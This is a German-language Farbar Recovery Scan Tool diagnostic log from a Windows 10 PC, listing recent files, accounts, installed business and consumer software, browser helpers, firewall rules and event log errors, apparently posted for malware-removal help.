2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf
2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf
2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf
2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule
2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-10 09:02 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-10 09:02 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-10 09:02 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles
2021-01-10 09:01 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-10 09:01 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-10 09:01 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2021-01-10 09:01 - 2019-12-07 10:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2021-01-10 08:57 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-10 01:38 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-10 01:38 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-10 01:38 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-10 01:38 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-10 00:59 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-10 00:58 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-10 00:41 - 2019-01-08 11:16 - 000000000 ____D C:\Users\buskr5\AppData\LocalLow\Temp
2021-01-09 18:20 - 2018-12-17 10:05 - 000000000 __SHD C:\Users\ITMueller\IntelGraphicsProfiles
2021-01-09 18:17 - 2018-12-19 09:09 - 000000000 ____D C:\01_Laufwerke
2021-01-09 16:01 - 2018-12-18 08:26 - 000002350 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk
2021-01-09 15:48 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\ConnectedDevicesPlatform
2021-01-09 15:44 - 2018-12-19 10:28 - 000000000 ____D C:\Program Files (x86)\InstallShield Installation Information
2021-01-09 15:19 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Packages
2021-01-09 15:18 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-09 15:04 - 2020-07-16 08:02 - 000003368 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1001
2021-01-09 15:04 - 2020-07-15 21:58 - 000002395 _____ C:\Users\ITMueller\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-01-09 15:04 - 2018-12-17 09:54 - 000000000 ___RD C:\Users\ITMueller\OneDrive
2021-01-09 15:03 - 2018-12-17 11:01 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Adobe
2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ___RD C:\Users\ITMueller\3D Objects
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\ConnectedDevicesPlatform
2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages
2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp
2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx
2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner
2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-12-17 12:50 - 2020-07-16 08:02 - 000003362 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1002
2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive
2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder
2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2019-01-16 11:54 - 2019-01-16 11:54 - 000000463 _____ () C:\Users\buskr5\AppData\Local\belegtransfer_setup.log

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von buskr5 (10-01-2021 09:05:09)
Gestartet von C:\Users\buskr5\Downloads
Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)
buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Administrator - Enabled) => C:\Users\buskr5
DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)
Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)
ITMueller (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\ITMueller
WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)
Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)
DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)
HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)
HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)
HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)
iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)
KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden
MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)
Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)
Screenpresso (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Screenpresso) (Version: 1.8.4.0 - Learnpulse)
Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )
Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden
Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)
Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden
Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
Zoom (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\ZoomUMX) (Version: 5.1 - Zoom Video Communications, Inc.)

Packages:
=========
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_122.1.778.0_x64__v10z8vjag6ke6 [2021-01-09] (HP Inc.)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-06-02] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]
Phototastic Collage -> C:\Program Files\WindowsApps\ThumbmunkeysLtd.PhototasticCollage_3.23.1.0_x64__nfy108tqq3p12 [2020-11-12] (Thumbmunkeys Ltd)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Drivers32: [vidc.spv1] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\ScreenpressoCodec.dll [167656 2021-01-09] (Learnpulse -> LearnPulse)

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2013-07-01 00:17 - 2013-07-01 00:17 - 000017920 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libdtp.dll
2013-07-01 00:15 - 2013-07-01 00:15 - 000022016 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libidb.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000628224 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libike.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000116736 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libip.dll
2013-07-01 00:15 - 2013-07-01 00:15 - 000018432 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libith.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000013312 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\liblog.dll
2013-07-01 00:17 - 2013-07-01 00:17 - 000029184 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libpfk.dll
2013-07-01 00:17 - 2013-07-01 00:17 - 000035840 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvflt.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000039936 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvnet.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxp://bstbk-vollmachtsdatenbank.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxps://bstbk-vollmachtsdatenbank.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxp://download.datev.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxps://download.datev.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\sharepoint.com -> hxxps://rswm-files.sharepoint.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\buskr5\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img-20170430-wa0003.jpg
DNS Servers: 192.168.10.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

Network Binding:
=============
Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 
WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{C2EE26C6-1278-4E5A-BF61-BAD4EF414A5C}C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe] => (Allow) C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [UDP Query User{AB4AE912-D613-46D5-961F-1E0D5181E7A6}C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe] => (Allow) C:\program files\hp\hp officejet pro 7740 series\bin\hpnetworkcommunicatorcom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{B7BB2403-2541-4A72-BEBB-42B2D4C0ED89}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{0A0FE43E-0CC6-4D38-9113-8BEA5F960CD2}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{8A35891F-A73F-4FED-895A-19F1DA77B36C}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{14E4935D-3566-46BB-8062-4AF2550D8D98}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)

==================== Wiederherstellungspunkte =========================

21-12-2020 07:06:20 Geplanter Prüfpunkt
28-12-2020 10:50:36 Geplanter Prüfpunkt
06-01-2021 10:37:08 Geplanter Prüfpunkt
09-01-2021 15:44:13 Removed Eumex RNDIS64 Treiber V1.02.

==================== Fehlerhafte Geräte im Gerätemanager ============

Name: Shrew Soft Virtual Adapter
Description: Shrew Soft Virtual Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Shrew Soft
Service: vnet
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/10/2021 12:41:33 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren.
.

Error: (01/10/2021 12:41:33 AM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.
]

Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc0000005
Fehleroffset: 0x03233f2e
ID des fehlerhaften Prozesses: 0x285c
Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 4c0

Startzeit: 01d6df75472ad580

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Unknown

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 838

Startzeit: 01d6df7570957287

Beendigungszeit: 24

Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2ddc

Startzeit: 01d6d2c180af7335

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe

Relative Anwendungs-ID des fehlerhaften Pakets: App

Absturztyp: Cross-process

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 28f4

Startzeit: 01d6d2c07cb57be1

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process


Systemfehler:
=============
Error: (01/10/2021 09:01:36 AM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

